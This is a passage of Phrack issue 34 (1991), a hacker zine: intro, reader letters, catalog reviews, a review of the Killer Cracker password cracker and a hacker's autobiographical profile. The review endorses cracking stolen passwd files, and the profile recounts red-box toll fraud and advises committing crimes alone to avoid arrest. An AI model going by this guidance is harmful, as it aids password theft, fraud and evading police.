home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Phrack / Phrack Issue 34.sit / Phrack Issue 34
Text File  |  1997-02-22  |  155KB  |  3,217 lines

  1. <head>
  2. <title>Phrack Magazine Issue 34, File 1 of 1 </title>
  3. <head>
  4. <body>
  5. <pre>
  6.                                 ==Phrack Inc.==
  7.  
  8.                 Volume Three, Issue Thirty-four, File #1 of 11
  9.  
  10.                               Issue XXXIV  Index
  11.                               __________________
  12.  
  13.                                P H R A C K  3 4
  14.  
  15.                                October 13, 1991
  16.                               __________________
  17.  
  18.                            ~Technology for Survival~
  19.  
  20.  
  21.      Welcome back to Phrack Inc.  From now on, the editorship will consist of
  22. Crimson Death and Dispater.  We have decided to join both our forces and pool
  23. our assets to make Phrack even better.  We will have accounts at various
  24. Internet sites, however, all file submitions should be mailed to
  25. phracksub@stormking.com.  If you do not have access to the Internet give Free
  26. Speech BBS a call.  Crimson Death will take it from there.
  27.  
  28.      Special thanks this month goes out to Night Ranger for being great help!
  29. Also thanks to Inhuman and Laughing Gas for taking the time to submit
  30. material.
  31.  
  32.      Phrack has never really had a distrabution BBS, but you can always get it
  33. on the Internet at EFF.ORG or CS.WIDENER.COM.  Off the Internet, the BBS
  34. distribution will be from Free Speech BBS.  Below are a list of a few other
  35. boards that carry all the Phracks.
  36.  
  37.                      Free Speech BBS     (618) 549-4955
  38.                      Blitzkreig BBS      (502) 499-8933
  39.                      Digital Underground (812) 941-9427
  40.                      Pyrotechnic's Pit   (407) 254-3655
  41.  
  42.      We would also like to thank the nameless numbers of BBS's out there that
  43. carry Phrack Inc. without their names being listed here!
  44.  
  45.      In this issue of Phrack Inc. we are starting a "letters to the editor"
  46. section called "Phrack Loopback."  Any questions, comments, corrections, or
  47. problems that you the reader would like to air with Phrack publically will be
  48. answered there.  Loopback will also contain information such as reviews of
  49. other magazines, catalogs, hardware, and softare.  With Loopback we hope to
  50. make Phrack Inc. more interactive with our readers.
  51.  
  52.      This month we had an oportunity to interview one of our "hacker hero's",
  53. The Disk Jockey.  We are also trying to "liven up" Phrack World News a little
  54. by adding some editor's comments about recent news topics.  If we get a
  55. positive response, we will continue doing this.  Hopefully you will respond
  56. with your views as well.
  57.  
  58. Your Editors,
  59.  
  60.                Crimson Death                          Dispater
  61.             cdeath@stormking.com               phracksub@stormking.com
  62. ===============================================================================
  63. COMMENTS INSERTED BY SERVER:
  64.  
  65.     As the server of the Phrack Mailing List, I'd like to get a few
  66. words in.  First, since I am currently a VERY DUMB list server, I am currently
  67. not very interactive.  I am working with the system administrators and owners
  68. to get an interactive "LISTSERV" onto this machine.  I would also like to know
  69. if anyone can get me access to an IP address via SLIP at an Internet site
  70. VERY CLOSE to the Newburgh/Poughkeepsie, NY area.  Another thing I could use
  71. is a Phrack SubBot for IRC.  Something small that would allow you to get
  72. information on the release date of the next Phrack, add your name to the
  73. Mailing List, find out the Index of the last issue and such.  I can handle
  74. awk, perl and 'C'.  An IRC connection (Not the server software) would also
  75. be interesting.  Another thing I heard of and am interested in is something
  76. that might start a seperate list.  There is a game, where you write a program
  77. to make a robot to fight another programmed robot.  You run these against
  78. each other to see who will win.  You can then modify the code to try again.
  79. It needs to be compatible with an IBM Risc/6000 running AIX 3.1.5 running
  80. patch #2006.  Help is also needed with SENDMAIL.CF configuration and etc.
  81. Basically, if you have something that the SERVER might be interested in,
  82. please mail "server@stormking.com". Also, if someone mentions that they are
  83. not receiving a copy when they asked to subscribe, anything that DOES bounce
  84. back here is automatically deleted.  For example, if something comes back
  85. from SUSY.THUNDER@POKER.LASVEGAS.NV.CA (Susan Lynn Headley) and I am told
  86. that POKER.LASVEGAS.NV.CA is not connected to CYBERPUNK.HAFNER.MARKOFF.NY.NY
  87. I will NOT attempt to resolve the message.
  88.  
  89.                     Storm King List Server
  90. ===============================================================================
  91. _______________________________________________________________________________
  92.  
  93.                         Phrack XXXIV  Table of Contents
  94.                         =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  95.  
  96.  1. Introduction to Phrack 34 by Crimson Death & Dispater
  97.  2. Phrack Loopback by The Phrack Staff
  98.  3. Phrack Prophile of The Disk Jockey by The Disk Jockey & Dispater
  99.  4. The AT&T Mail Gateway by Robert Alien
  100.  5. The Complete Guide to Hacking WWIV by Inhuman
  101.  6. Hacking Voice Mail Systems by Night Ranger
  102.  7. An Introduction to MILNET by Brigadier General Swipe
  103.  8. TCP/IP: A Tutorial Part 2 of 2 by The Not
  104.  9. Advanced Modem-Oriented BBS Security by Laughing Gas & Dead Cow
  105. 10. PWN/Part01 by Dispater
  106. 11. PWN/Part02 by Dispater
  107. _______________________________________________________________________________
  108.  
  109.                                 ==Phrack Inc.==
  110.  
  111.                 Volume Three, Issue Thirty-four, File #2 of 11
  112.  
  113.                          ^[-=:< Phrack Loopback >:=-]^
  114.  
  115.                              By:  The Phrack Staff
  116.  
  117.      Phrack Loopback is a forum for you, the reader, to ask questions, air
  118. problems, and talk about what ever topic you would like to discuss.  This is
  119. also the place The Phrack Staff will make suggestions to you by reviewing
  120. various items of note; magazines, software, catalogs, hardware, etc.
  121. _______________________________________________________________________________
  122.  
  123. What's on Your Mind
  124. ~~~~~~~~~~~~~~~~~~
  125.  
  126. >Date: Fri, 20 Sep 91 01:22:30 -0400
  127. >To: phracksub@stormking.com
  128. >
  129. >So what exactly DID happen to Agent Steal?  There was a small blurb in
  130. >PWN for 33, but gave no details.  Why was he arrested, what was confiscated,
  131. >and how long will he probably be away for.
  132. >
  133. >Mind you, this is a tragic loss, since Agent Steal was a gifted hacker and
  134. >had a whole lotta balls to boot.
  135. >
  136. >                               Sincerely,
  137. >
  138. >                                   A concerned reader
  139.  
  140.      To be honest, it would not in his best interest to say much about his
  141. case before his trial.  What we have written comes from a very reliable source.
  142. Some people close to him are denying everything.  This is most likely to keep
  143. from happening to him what happened to people like Mind Rape, who have basically
  144. been "convicted" by the media.
  145.  
  146. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  147.  
  148. >From: Drahgon
  149. >Date: Thu Sep 26 06:00:35 1991
  150. >
  151. >    Dear Dispater,
  152. >
  153. >        My name is Drahgon unless, of course.  I have several things to blow
  154. >    from my mind here....
  155. >
  156. >        How is the progress of Phrack  33?  I am not really up on all the
  157. >    hoopla surrounding  it, but  I am  curious.  In  high school  I  often
  158. >    published "underground newsletters" about the manufacture of drugs and
  159. >    explosives, etc.   The computer underground is a  new territory for me
  160. >    and I have just begun.  I would love to hear about your mag....I would
  161. >    perhaps have something to offer.
  162.  
  163.      We at Phrack Inc. are here to publish any kind of information you the
  164. reader are interested in.  We, unlike many other people out there, will not
  165. judge you and can call you a "lamer" if you submit something to us that we
  166. might think is a little elementary.  We might not necessarily run it in Phrack,
  167. but we aren't the kind of people that are going to call you up in the middle
  168. of the night on an Alliance Teleconference and harass you.  In fact, there are
  169. many text files out there that are out-dated and need to be corrected!
  170. Simply put, if you are interested in it, there are probably two hundred others
  171. out that are afraid to ask, because some El1Te person will call them
  172. "stupid."  Here at Phrack Inc., WE ARE NOT El1Te, WE ARE JUST COOL AS HELL!
  173. We want to help everyone in their quest for knowledge.
  174.  
  175. >        Secondly,  I want to start  my own bbs up  here in my town.  This
  176. >    town  is dead,  but there  is still a  glint of  life, it  needs to be
  177. >    kindled.  There are currently  no BBS's up here that carry information
  178. >    of  an "alternative nature",  and there  is in fact  laws that prevent
  179. >    them from springing up.  (whatever happened to freedom of the press?),
  180. >    Well,  anyway, I  would like to  know if you  would support  a BBS of
  181. >    mine, and maybe you could give me some pointers...
  182. >
  183. >    Thanx ALOT
  184. >         DRAHGON
  185.  
  186.      That's great!  We're always glad to see new faces that are truly interested
  187. in helping people by becoming a source of information.  If you
  188. have any questions about BBS's you should ask the expert, Crimson Death.  He
  189. will be more than happy to help you out.
  190. _______________________________________________________________________________
  191.  
  192. Corrections
  193. ~~~~~~~~~~
  194.      In V.3, I#33, File 9 of 13, there was a error.  R5 Should have been a
  195. 10K pot and not just a resistor.  The corrected part of the schematic
  196. should look like this:
  197.        _
  198. +9__S1/  _____________________________________________________________
  199.         |        |           |          |                   |   S3    |
  200.        R1       R2           |         R3                o  @  o      |
  201.         |___C1___|      _____|          |_________|/___ /   o   \___  |
  202.         |    ____|_____|_____|____      |     |   |\   |    |      _| |
  203.      _| o   |    6     4    14    |    R4     |__ D1   |    |   R9<   |
  204.  S2   | o  _|5                  13|_____|       _|     |    |__  |    |
  205.         | | |                     |     |__  R5<       |      _| |    |
  206.         g |_|10       IC1        8|_      _|  |        |   R8<   |    |
  207.             |         556         | |__R6<    g        |__  |    |    |
  208.            _|9                  12|_|                    _| |    |    |
  209.           | |                     | |__C2__g          R7<   |    |    |
  210.           | |_11___3___7___2___1__|                    |    |    |    |
  211. _______________________________________________________________________________
  212.  
  213. Hardware Catalog Review
  214. ~~~~~~~~~~~~~~~~~~~~~~
  215. by Twisted Pair
  216.  
  217. You can never get enough catalogs.  One reason is because you never know what
  218. off-the-wall parts you'll be needing.  From time to time I'll be reviewing
  219. catalogs so you'll be able to learn where to get the really good stuff as far
  220. as computer equipment, telco test equipment, and IC chips are concerned.  In
  221. this issue, we study two of them...
  222.  
  223. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  224.  
  225. SYNTRONICS
  226. 2143 Guaranty Drive
  227. Nashville, Tennessee  37214
  228. (615) 885-5200
  229.  
  230. I recently saw an issue of "Nuts and Volts" magazine which had a Syntronics ad
  231. in it.  I sent the dollar they wanted for a catalog.  Apparently, demand for
  232. the catalogs was so  great that they're having some more printed up.  They sent
  233. my dollar back with an explanation and a partial photocopy of the catalog.
  234. An associate on the left coast and I want to build a tone decoder and have been
  235. looking for a particular chip for a long time.  We found it in this catalog.
  236. It's an SSI-202 Tone Decoder IC for $12.  Not bad for a chip I was unable to
  237. locate in about 30 catalogs I've searched through.  A fellow phreak was told by
  238. a zit-faced Radio Shack employee over their 800 number, "They had only 3 left
  239. and they would cost $100 each." I don't think so.
  240.  
  241. Syntronics is selling plans for an interesting device you hook up to the phone
  242. line.  With it you can call it and  turn on any one of three 110VAC outlets.
  243. To turn them  on you use simple DTMF commands.  This would be useful for
  244. turning on your computer, modem, room bug, security lights, etc from a remote
  245. location.  Plans for this device  cost $9 and you'd need the above-mentioned IC
  246. chip to build it with.
  247.  
  248. Syntronics carries:
  249. -------------------
  250.  Project Plans    Software    Unusual Hardware    Kits    IC's    Transistors
  251.  
  252. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  253.  
  254. Telephone International         (The marketplace for
  255. PO BOX 3589                     communications equipment,
  256. Crossville, Tennessee  38557    services, and employment)
  257. (615) 484-3685
  258.  
  259. This is a monthly publication you can receive free. It's usually about 30 pages
  260. printed on large yellow-pages paper.  To save yourself the $50 a year
  261. first-class yearly subscription rate, just tell them you're a telephone
  262. technician.  Tell them you need to often buy PBX's, Terminal Blocks, etc.
  263. They'll send it to you free, because you're special!
  264.  
  265. Here's a sampling of stuff you can find in there:
  266. -------------------------------------------------
  267. A Complete Digital Switching System with 3200 lines on a flatbed trailer !!!!!!
  268. Repaired Payphones                                Optical Fiber xmission system
  269. Operator's Headsets                                     CO Digital multiplexers
  270. AT&T teletypes                                                Used FAX machines
  271. AT&T Chevy bucket trucks                                           Hookswitches
  272.  
  273. Digital error message announcers     Central Office Coin System Processor Cards
  274.  
  275. Telephone International lists a bunch of telco seminars happening around the
  276. country on their "Calendar of Events" page.  They also list conferences for
  277. security organizations including dates and phone numbers you'd need to register.
  278.  
  279. That's it for this edition of Hardware Hacking.  Keep an eye out for good
  280. suppliers to the Phreak world.  Pass'em along to Phrack.
  281.  
  282.                                -T_W-I_S-T_E-D_
  283.                                   -P_A-I_R-
  284. _______________________________________________________________________________
  285.  
  286. A Review of the Killer Cracker V.7.0
  287. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  288. by The Legion of d0oDez
  289.  
  290. As every hacker worth his/her salt knows, the Unix operating system has major
  291. security problems when it comes to it's passwd file.  Although this may be
  292. good as some people think information should not be hoarded, others think
  293. information should be kept to be people who can use it best, the one's with
  294. the most money.  The passwd file is the Unix file that stores the user
  295. information which included username, home directory, and passwords among
  296. others.  I will not go into the basics of Unix as this is not a Unix
  297. how-to hack file.  It is a review of Killer Cracker 7.0 (aka KC7.)
  298.  
  299. KC7 is a Unix password hacker that is portable to most machines.  It is
  300. written by Doctor Dissector and is free software as the terms of the GNU
  301. General Public License (By the Free Software Foundation <address at end of
  302. file>) states.  The version 7.0 is not the latest version but seems to be
  303. the best to use.  It is dated as 6/1/91 which makes it pretty recent.  8.0
  304. is rumored to be out but we have not had the opportunity to review it yet as
  305. we are still testing it. ;-)
  306.  
  307. The best thing about KC7 is that you can run it on most machines that will
  308. run C programs which happens to include MS-DOS machines.  With this in
  309. mind, you can now let your PC do the work of hacking passwords in the privacy
  310. of your own home without having to use a mainframe which might be a bit
  311. risky.  The distribution copy of KC7 comes with the following files:
  312.  
  313.       KC.EXE -- MS-DOS executable
  314.       KC.DOC -- Documents
  315.   Source.DOC -- The source code to KC
  316.         KC.C -- The Turbo C source code
  317.  
  318.   And other files that pertain to DES and word files.
  319.  
  320. KC7 works by taking an ascii file composed of words and encrypting them so
  321. that it can compare the encrypted words with the passwords in the PASSWD file.
  322. It is pretty efficient but if running on an MS-DOS system, you will probably
  323. want to use a machine that is at least a 286-12 or higher.  The time to
  324. complete a PASSWD file is directly proportional to how large the file is
  325. (max size of PASSWD must be less than 64K on an MS-DOS machine) and what
  326. speed of machine you are using.  There are options which allow you to take
  327. words (aka guesses) from other sources as well as a words file.  These
  328. sources can be words from the PASSWD file such as the username, single
  329. characters, and straight ascii characters such as DEL or ^D.  It can also
  330. manipulate the guesses in various ways which might be helpful in guessing
  331. passwords.
  332.  
  333. Another useful option is the RESTORE function.  KC7 has the ability to
  334. allow the user to abort a crack session and then resume cracking at a
  335. later date.  This is very nice since one does not always have the time
  336. nor patience to crack a 50k passwd file without wanting to use his/her
  337. machine for other uses such as trying out new passwords.
  338.  
  339. We have found that the best way, as suggested by the author, to crack is by
  340. using the default method which is to crack by word and not by username.
  341. You will understand when you get a hold of the software.
  342.  
  343. You can get KC7 at most H/P oriented bbs's as everyone thinks he/she is
  344. a Unix wizard nowadays.
  345.  
  346. Overall, KC7 is an excellent program and we suggest it to all Unix hackers.
  347. We also hope you have enjoyed this file and we look forward to bringing
  348. more interesting reading to your terminal.  Until then.... Happy hacking.
  349. _____________________________________________________________________________
  350.  
  351.                                 ==Phrack Inc.==
  352.  
  353.                 Volume Three, Issue Thirty-Four, File #3 of 11
  354.  
  355.                 -*[  P H R A C K  XXXIV  P R O P H I L E  ]*-
  356.  
  357.                         -=>[ Presented by Dispater ]<=-
  358.  
  359.                                 The Disk Jockey
  360.                                 ~~~~~~~~~~~~~~~
  361.               Handle: The Disk Jockey (over 10 years now...)
  362.             Call him: Doug
  363.            Reach him: douglas@netcom.com
  364.         Past handles: None
  365.        Handle origin: Selected it way back in the Apple days, when
  366.                       it was hip to have a hardware-related name.
  367.        Date of Birth: 12/29/67
  368.  Age at current date: 23
  369. Approximate Location: Silicon Valley
  370.               Height: 6'1"
  371.               Weight: 220 lbs.
  372.            Eye color: Green
  373.           Hair Color: Blond/brown
  374.            Education: Cornell, Univ of Michigan, Stanford, and a
  375.                       slew of others schools that I had the
  376.                       opportunity to attend.  What started out as
  377.                       a strong belief in law became so jaded that
  378.                       I fell back on Comp Sci.  Still wake up in
  379.                       the middle of the night yelling "NO!, NO!"
  380.                       Also have a wallpaper degree in Psychology.
  381.            Computers: First: Apple //.  Presently: several.  Mac
  382.                       IIfx, 386/33, and several others that I can't
  383.                       seem to get rid of...
  384.  
  385. -------------------------------------------------------------------------------
  386.  
  387. The Story of my Hacking Career
  388. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  389.  
  390.      I was lucky enough to be able to get my hands on computers early, back in
  391. the days of the PET and the TRS-80.  Although we poke fun at a Trash-80 now, at
  392. the time I was completely fascinated by it.  Remember Newdos/80, LDOS, and
  393. utilities like SuperZap?
  394.  
  395.      Things started really rolling after a friend introduced me to the Apple.
  396. Although I never fell into the stereotype of being a computer "nerd" (don't we
  397. all like to think that?), compared to the redundancy of normal schoolwork,
  398. learning about the Apple was a new and unexplored world.  Unlike most of the
  399. other computer "types", I didn't read science fiction, didn't have any social
  400. problems, and thought looking at girls was more enjoyable than talking about
  401. hardware.  Well, depending on the hardware. (ha-ha!)
  402.  
  403.      "Cracking" Apple software was of course the next logical step.  The 6502
  404. was a wonderful chip, and easy to learn.  Copy-cards and other "hacked"
  405. hardware was becoming findable and it was getting to the point that the
  406. only goal was to get your hands on pre-release software.  Before I had entered
  407. the "modem" world, friends had a network of other people across the country and
  408. traded things by mail.
  409.  
  410.      Of course the whole world changed when I picked up a 300 baud modem.
  411. Suddenly there was the communication and knowledge that I had been hungry for.
  412. People wrote text files on just about everything imaginable.  What is the
  413. president's phone number?  How can I call the pope?  How can I make lowercase
  414. on my Apple II?  What are the routing numbers for boxing to the Eastern Bloc
  415. countries?
  416.  
  417.      Codes were never much of an interest.  The systems that ran them, however,
  418. were quite interesting.  As technology advanced, SCCs started  using
  419. sophisticated AI techniques to detect any kind of abnormal usage instantly.
  420. Codes used to last several months, now they only lasted a few hours.  Boxing,
  421. however, was a little more elegant and was the flashy way to call your friends.
  422.  
  423.      Even before I had ever heard of boxing or phreaking, I enjoyed the
  424. benefits of what we now know as a "red box".  While in boarding school, I
  425. noticed that a somewhat broken phone emitted obscenely loud "beeps" when you
  426. dropped in a quarter.  I took a little micro-recorder and recorded myself
  427. dropping about $5.00 into the phone.  When I played this back into the
  428. telephone, the telco thought I was actually dropping change in the machine!  I
  429. was able to call my girlfriend or whomever and speak for hours.  Now most
  430. payphones mute those tones so they are barely audible, if at all.
  431.  
  432.      Local user groups were a good place to pick up software, legal and
  433. otherwise.  Remember those damn "CLOAD" magazine tapes for the TRS-80? 80-Micro
  434. magazine?  The early 80's was the time of the hardware hacker - anything
  435. bizarre you wanted you had to make yourself, since it wasn't available
  436. otherwise.  Now you can call any of a slew of 800 numbers, give them your
  437. credit card number (!) and have it on your doorstep the next day.
  438.  
  439.      I think part of the problem of the "new generation" of hackers, phreakers,
  440. warez kids, etc, is that they never had the experience with low-level stuff and
  441. actually having to into the hardware to get what they wanted.  Their only
  442. programming experience is coming from school, which gives a shallow and usually
  443. totally impractical background for the "real world".
  444.  
  445.      My eventual disgust with the pirate world came when products such as
  446. "Pirate's Friend" came out, allowing people to sector edit out my name and
  447. insert theirs.  I had spent quite a lot of time trying to find new software,
  448. and enjoyed the ego stroke of having my name passed around. I had a lot of
  449. respect for book authors that were plagiarized after that...
  450.  
  451. About the industry
  452. ~~~~~~~~~~~~~~~~~
  453.  
  454.      The computer industry in general is interesting.  Working in it, I hope
  455. I'm justified to speak about it.  Getting  a job is quite easy, since the
  456. technology is changing so much, unless it is in something that will be around
  457. for some time, you can usually pick up a job by just knowing the latest
  458. developments, the buzzwords, and having good "chemistry".  In the valley many
  459. firms realize that colleges don't really teach you much in the way of practical
  460. knowledge.  At best, they give you the opportunity to try different types of
  461. machines.  It amazes me that HR departments in companies across the country
  462. won't even look at a resume unless the applicant has a college degree.
  463. Advanced degrees are a different matter and are usually quite applicable
  464. towards research, but your usual BA/BS variety?  Nah.  If you want to make a
  465. lot of money in this industry, all you need to do is get the reputation as a
  466. person who "gets things done" and have superior communication skills.  You can
  467. write your ticket after that.
  468.  
  469. About legal issues
  470. ~~~~~~~~~~~~~~~~~
  471.  
  472.      Anyone who has ever read some of my later text files (1986, 1987) knows
  473. that I had no qualms about the legalities of beating an establishment.
  474. Although my line of morals was probably beyond where others placed theirs, I
  475. could always justify to myself damage or loss to an establishment, "beating the
  476. system", rather than hurting the individual.  Although I am pretty right-winged
  477. in beliefs, I have a great distrust for the policing agencies.
  478.  
  479. Various memories
  480. ~~~~~~~~~~~~~~~
  481.  
  482.      Getting a call from my father while at school and being told that Control
  483. C had called him and relayed the message "Tell Doug the FBI are after The Disk
  484. Jockey.  Get rid of everything and hide."  To say I "cleaned house" would have
  485. been a gross understatement.  I knew this was true, I, like many others, had
  486. just ridden on the false pretense that they would have better things to do then
  487. come after me.  I later saw intelligence reports showing that I had been kept
  488. track of for some time.  I was described as:
  489.  
  490. "Involved in some type of student-loan scam through creating fictitious college
  491. applicants at his school.  Very violent temper, ruthless attitude.  Breaks
  492. people's legs for money (TX).  Owns a motorcycle and a european sedan.  Nasty
  493. hacker."
  494.  
  495.      Only a handful of people would know that I had a motorcycle, so it was
  496. somewhat upsetting that they had this kind of information on me.  I later saw
  497. some of this same information in Michigan Bell Security's records.  They also
  498. had the correct phone number for my place at Cornell, my parents number, and
  499. even the number of some of my personal non-computer related friends.
  500.  
  501.      SummerCon in 1987 was a fun experience.  I had the opportunity to meet
  502. many of the people that I communicated with regularly, as well as wonder why
  503. people thought St. Louis was such a wonderful place.  While there were a few
  504. socially "on-the-fringe" types, I was amazed that most of the other "hackers"
  505. didn't fit the usual stereotypes.  They were just regular guys that had a some
  506. above average cleverness that allowed them to see the things that others
  507. couldn't.
  508.  
  509.      By the time I was 20 years old, I had about $40,000 worth of credit on
  510. plastic, as well as a $10,000 line of credit for "signature loans" at a local
  511. bank.  The credit system was something that seemed fun to exploit, and it
  512. doesn't take long to figure out how the "system" works.  With that kind of cash
  513. Aavailable, however, it's tempting to go and buy something outrageous and do
  514. things that you wouldn't normally do if you had the cash.  This country is
  515. really starting to revolve around credit, and it will be very hard to survive
  516. if you don't have some form of it.  If more people were aware of how the credit
  517. systems worked, they might be able to present themselves in a better light to
  518. future creditors.  I don't think that credit is a difficult thing to
  519. understand, I just had an unusual interest in understanding and defeating it.
  520. Perhaps this is something that my future text files should be about.
  521.  
  522. Getting busted
  523. ~~~~~~~~~~~~~
  524.  
  525.      On June 27, 1988 at 1:47am, I had just parked my car outside my apartment
  526. and was walking up to the door when I heard someone say "Doug?"  I knew that no
  527. friend of mine would be visiting at that hour, so I knew my fate before I
  528. turned around.  An FBI agent, State police detective and a local detective were
  529. walking up to me.  "We have a warrant for your arrest." Interestingly, they had
  530. actually several warrants, since they weren't sure what my name was.  I was
  531. being arrested for 6 counts of "conspiracy to commit fraud".  After being
  532. searched to make sure I wasn't carrying a gun, they asked if they could "go
  533. into my apartment and talk about things".  Although I had completely "cleaned
  534. house" and had nothing to hide in there, I wasn't about to help out an
  535. investigation on me.  "Ah, I think I had better contact an attorney first."
  536. "Is there one you can call right now?"  "Are you kidding?  It's 2:00am!"
  537.  
  538.      I was handcuffed and had my legs strapped together with a belt and was
  539. thrown in the back of a car.  This was one of those usual government cars that
  540. you see in the movies with the blackwalls and usual hubcaps.  Interestingly
  541. enough, the armrest of the car hid quite an array of radio equipment.  Although
  542. pretty freaked out, I figured the best thing to do at that point was try to get
  543. some sleep and call the best attorney money could by in the morning.
  544.  
  545.      Little did I know where I was being brought.  I was driven all the way to
  546. a small Indiana town (population 5,000) where a 16 year-old Wheatfield Indiana
  547. boy had made the statement that he and I "agreed to devise a scam".  Although
  548. nothing was ever done, merely planning it created the conspiracy charge.
  549.  
  550.      I figured that after my arraignment I could post bail and find an
  551. attorney.  I had almost $10k in the bank and could probably find more if I
  552. needed it.  I was sadly mistaken.  The next day at my arraignment the charges
  553. were read and bail was set -- $150,000.00, cash only!
  554.  
  555.      In a strange turn of events, the FBI decided to totally drop the case
  556. against me.  The federal prosecutor figured it wasn't worth wasting his time
  557. and they jumped out.  However, the Indiana state police were involved in my
  558. arrest and were angry that the FBI was dropping the case after they had
  559. invested so much time and money in the case, so they decided to pursue the case
  560. themselves.  There is so much friction between the FBI and state police, that
  561. the FBI didn't even answer their letters when they tried to request information
  562. and data files on me.
  563.  
  564.      Funny.  I spent 6 months in a tiny county jail, missing the start and
  565. first semester of school.  I was interrogated constantly.  I never told on a
  566. sole and never made a statement about myself.  I sat in jail daily, reading
  567. books and waiting for my court dates.  Although I never expected it, nobody
  568. ever thanks you when you keep your mouth shut.  I can't imagine that many
  569. people would sit in jail for a long time in order to save their friends.
  570. Perhaps it's a personal thing, but I always thought that although I doubt
  571. someone else would do it for me, I would never, ever tell anything on anyone
  572. else.  I would never be responsible for someone else's demise.  It took a lot
  573. of money, and a lot of friday nights of frustration, but I walked away from
  574. that incident without ever making a statement.  It was at a time when my
  575. "roots" were deepest and I probably could have really turned in a lot of other
  576. people for my benefit, but it was at a time in my life where I could afford to
  577. miss some school and the integrity was more important to me.  There were a lot
  578. of decisions that had to be made, and spending time in jail is nothing to be
  579. proud of, but I never backed down or gave in.  It did provide the time for me
  580. to really re-evaluate who and what I was, and where I was going.
  581.  
  582. People I've known
  583. ~~~~~~~~~~~~~~~~
  584.  
  585. Compaq            Personal friend for some time now.
  586. Control C         Mostly likely the craziest guy I've ever met.
  587.                   Really nice guy.
  588. Knight Lightning  Would call me up in the middle of the night and
  589.                   want to discuss philosophical and social issues.
  590.                   Kind of guy I would probably get along with outside
  591.                   of computers as well.
  592. Loki              Friend since high school.  Made a big splash in the
  593.                   h/p world, then disappeared from it.  He and I (and
  594.                   Control C) drove to SummerCon together.
  595. Shooting Shark    Great guy who used to be into calling bridges
  596.                   and would yell "Hey, I'm paying for this!"  Truly
  597.                   one of the only people that I ever knew that didn't
  598.                   do anything blatantly illegal.  Most of our email
  599.                   was over the optimization of crypt.  The Mad Alchemist
  600.                   Sysop of Lunatic Labs, one of the only boards that
  601.                   I feel is worth the telephone call anymore.
  602.                   He has given me a lot of slack and runs
  603.                   a BBS that picks up some of the most obscure
  604.                   information.  A sysop that others should be judged
  605.                   by.
  606. Tom Brokaw        Personal friend since childhood that stood by me
  607.                   through thick and thin, bailing me out of trouble
  608.                   time and time again.  I can never thank him enough
  609.                   for being a true friend.
  610.  
  611. BBSs
  612. ~~~
  613. More than I could mention here.  A few more recent notables --
  614.  
  615. Atlantis          Although run on an Apple, the Lineman had this
  616.                   system so slick and customized that it became the
  617.                   standard that a lot of the PC based boards were
  618.                   created with.  It was the first real
  619.                   "clearinghouse" for text files.
  620. Free World II     Run by Major Havoc and myself, this was an
  621.                   incredibly robust system, and was one of the first
  622.                   to be run on a US Robotics HST. Although it was
  623.                   primarily a discussion board, the file areas
  624.                   offered some of the best files -- virtually no
  625.                   games, but about every real utility and the like.
  626.  
  627. Metal AE          201-879-6668 - this was a true blue AE line that
  628.                   was around for like 5 or 6 years and was ALWAYS busy.
  629.                   Had all of the original cDc and other bizarre text
  630.                   files, occasionally some new Apple warez.
  631.  
  632. Lunatic Labs      Still up and still great.
  633.  
  634. Metal Shop Private    Perhaps one of the best boards of all time.
  635.                       Run by Taran King and had a healthy, yet
  636.                       secure userlog.  It was a closed system, the
  637.                       only way to get on was to know somebody.
  638.                       Everyone on the system knew each other in
  639.                       some sense.
  640.  
  641. World of Cryton   One of the first boards to have a "philter" and to
  642.                   really push the messages as far as codes, accounts,
  643.                   card numbers, etc.  This was also the demise, along
  644.                   with many of the 414 hackers.
  645.  
  646. Misc
  647. ~~~
  648.  
  649. 2600 Magazine     How could I not like a magazine that published
  650.                   articles I wrote?  This really is a great magazine
  651.                   and anyone who is interested in computers, privacy,
  652.                   or cyber-issues in general should subscribe.
  653.  
  654. Fame...?          Was in the movie "Hoosiers"  (thanks for bringing
  655.                   that up, Shark!), even though I'm not a basketball
  656.                   fan.  Met Dennis Hopper, etc. Went to school with
  657.                   a lot of famous people's kids.  Most have some
  658.                   pretty serious problems.  Be glad you are who you
  659.                   are.
  660.  
  661. Marriage...?      I'm single and will do everything I can to stay
  662.                   that way.  When people ask me about getting married
  663.                   I tell them that the idea of car payments scare me.
  664.                   I enjoy having girlfriends, but I've become too
  665.                   independent.  I still run around at bars until
  666.                   sometimes 3:00am or so, but still manage to spend
  667.                   about 50 or 60 hours a week at work.  Even if I cut
  668.                   out the bar scene, I wouldn't have much time to
  669.                   spend with someone else on a daily basis.
  670.  
  671. Advice            If you ever get into doing illegal things, make
  672.                   sure you do them by yourself.  Your chances of
  673.                   getting caught when you do things solo and resist
  674.                   the temptation to "brag" about them is minimal.
  675.                   When someone else knows about what you have done,
  676.                   it doesn't matter how good of a friend they are.
  677.                   If they get into trouble, you are going to the
  678.                   sacrificial lamb when it comes to negotiating their
  679.                   freedom.  Even the strongest willed individuals
  680.                   seem to crumble when questioned by police.
  681.                   Groups are bad news.  There are very little
  682.                   advantages to being in a group and all it does is
  683.                   increase your personal risk by multitudes.
  684.                   Cracking groups aren't nearly as dangerous, but
  685.                   they DO bring boards down.  Look to the fate of
  686.                   groups such as LOD for examples of group fate.  Lex
  687.                   Luthor, perhaps one of the most elusive and private
  688.                   hackers of all time was the one to bring down the
  689.                   rest of the group.  This was tough for me, as many
  690.                   of the members were people I talked with and could
  691.                   really feel for.
  692.  
  693.                   Don't get discouraged in life if you feel that you
  694.                   are behind the rest because you don't come from a
  695.                   rich family or have the best equipment.  I left
  696.                   home when I was 17 years old, keeping only minimal
  697.                   contact with my parents since then and lived life
  698.                   pretty well, using my abilities to "smooth talk"
  699.                   and pure enthusiasm to walk into about any job.
  700.                   Don't put people down -- everyone has something to
  701.                   teach you, even the bum on the street might be able
  702.                   to tell you how to make some free phone calls!
  703.                   There is a wealth of information to be found via
  704.                   Usenet, text files, or even your school or public
  705.                   library.  Stay informed and well read.
  706.  
  707. Email             I always enjoy hearing from people.  Reach me via
  708.                   the Internet at douglas@netcom.com, or on Lunatic
  709.                   Labs BBS.
  710.  
  711. ________________________________________________________________________________
  712.  
  713.  
  714.                                 ==Phrack Inc.==
